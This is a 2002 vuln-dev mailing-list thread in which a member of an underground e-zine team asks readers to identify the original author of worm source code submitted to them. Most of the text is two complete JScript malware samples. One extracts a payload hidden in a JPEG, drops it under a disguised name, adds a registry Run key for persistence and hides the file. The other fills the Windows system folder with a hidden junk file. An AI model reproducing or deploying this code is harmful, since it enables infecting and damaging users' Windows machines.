Does this help? http://yodacker.hypermart.net/resources/SDF/gdk07-sdf-doc_cod.htm -David > -----Original Message----- > From: Arturo "Buanzo" Busleiman [mailto:buanzoat_private] > Sent: Sunday, March 17, 2002 11:13 PM > To: vuln-devat_private > Subject: Stolen source? > > > Hi! > > Do you recognize this source code? Can you tell which is the > real/original > author? > > I explain: I am a member of the Raregazz Team, we produce (!) > series of > underground-related articles. On the 18th edition, a > non-member send us an > article which was half-stolen from another author (not well > known either > of them). Now, he is sending us another article, a > source-code explanation > for a worm. This source code makes me remember of someone else's... > > So, I would like to find: > > a) the original author or at least > b) know if this source is not an original (i.e is stolen) > > Thank you! > > var ob, ws, ws2, g, g2, t, yu, ly, f, f2; > ob = new ActiveXObject("Scripting.FileSystemObject"); > ws = WScript.CreateObject ("WScript.Shell"); > n = ob.GetSpecialFolder(1)+"\\"; > yu = ran(); > ly = n+yu+".js"; > mai(); > function mai(){ > ws2 = ws.RegRead("HKCU\\Control Panel\\Desktop\\MenuShowDelay"); > if (ws2 != "auto"){ > > ws.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersio > n\\Run\\"+yu, l > y, "REG_SZ"); > ws.RegWrite("HKCU\\Control Panel\\Desktop\\MenuShowDelay", > "auto", "REG_SZ"); > g = ob.GetFile("girl.jpg"); > f = g.OpenAsTextStream(1, -2); > g2 = f.ReadAll(); > g2 = g2.substring(31029, 32457); > t = ob.OpenTextFile(ly, 2, true); > t.Write(g2); > t.Close(); > f2 = ob.GetFile(ly); > f2.attributes = f2.attributes + 4; > } > } > > function ran(){ > rr = new Array(15); > rr[0] ="$mstask"; rr[1] ="$command"; rr[2] ="$explorer"; > rr[3] ="$alg"; rr[4] > ="$logon"; rr[5] ="$ie"; rr[6] ="$icq"; rr[7] ="$win"; rr[8] > ="$system"; rr[9] > ="$sys"; rr[10] ="$scanreg"; rr[11] ="$yahoo"; rr[12] > ="$msn"; rr[13] ="$clock > "; rr[14] ="$logger"; rr[15] ="$yl"; > var 
irr = rr[parseInt(Math.round(Math.random()*15))]; > return (irr); > } > > > /* second source code */ > > var ob, f, f2, t, t2, n, w, ry0, ry1; > ob = new ActiveXObject("Scripting.FileSystemObject"); > t = new Date(); > t2 = t.getHours()+t.getMinutes()+t.getSeconds(); > n = ob.GetSpecialFolder(1)+"\\"; > wrote(); > > function wrote(){ > ry0 = ran(); > ry1 = ran2(); > w = n+ry0+t2+ry1; > f = ob.OpenTextFile(w, 2, true); > for (q = 0; q < 1000; q++){rew();} > f.Close(); > f2 = ob.GetFile(w); > f2.attributes = f2.attributes + 4; > } > > function ran(){ > rr = new Array(15); > rr[0] ="mstask."; rr[1] ="command."; rr[2] ="explorer."; > rr[3] ="alg."; rr[4] = > "logon."; rr[5] ="ie."; rr[6] ="leeme."; rr[7] ="win."; rr[8] > ="system."; rr[9] > ="sys."; rr[10] ="scanreg."; rr[11] ="icq."; rr[12] ="msn."; > rr[13] ="clock."; > rr[14] ="logger."; rr[15] ="yl."; > var irr = rr[parseInt(Math.round(Math.random()*15))]; > return (irr); > } > > function ran2(){ > rr2 = new Array(15); > rr2[0] =".exe"; rr2[1] =".doc"; rr2[2] =".com"; rr2[3] > =".bat"; rr2[4] =".tmp"; > rr2[5] =".xls"; rr2[6] =".ini"; rr2[7] =".inf"; rr2[8] > =".vxd"; rr2[9] =".dll" > ; rr2[10] =".htm"; rr2[11] =".cpl"; rr2[12] =".sys"; rr2[13] > =".dat"; rr2[14] = > ".yl"; rr2[15] =".hex"; > var irr2 = rr2[parseInt(Math.round(Math.random()*15))]; > return (irr2); > } > > function rew(){ > > f.Write(":::: GusanoDisk Y v5.recover ::::"); > f.Write("Creado :: "+ t2); > f.WriteBlankLines(90); > for (q = 0; q < 900; q++){f.Write("GusanoDisk Y by HeX. > Gracias por sus > megabytes."); > } > } > >